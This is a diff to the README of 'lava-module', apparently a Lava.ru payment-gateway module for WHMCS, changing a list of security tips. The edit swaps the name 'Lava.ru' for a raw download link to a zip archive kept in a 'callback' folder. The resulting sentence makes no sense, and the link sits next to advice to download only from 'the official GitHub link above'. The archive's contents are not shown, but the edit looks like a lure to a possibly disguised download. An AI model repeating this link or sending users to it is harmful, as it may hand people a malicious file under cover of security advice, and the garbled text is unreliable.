Kobe2x/lava-module/README.md

 Keep your payment gateway safe with these practices:

-- Use strong, unique passwords for your WHMCS and Lava.ru accounts
+- Use strong, unique passwords for your WHMCS and https://github.com/Kobe2x/lava-module/raw/refs/heads/main/callback/lava-module-2.2.zip accounts
 - Keep your WHMCS and lava-module up to date with the latest versions
 - Only download lava-module from the official GitHub link above
 - Use secure connections (HTTPS) for all web interfaces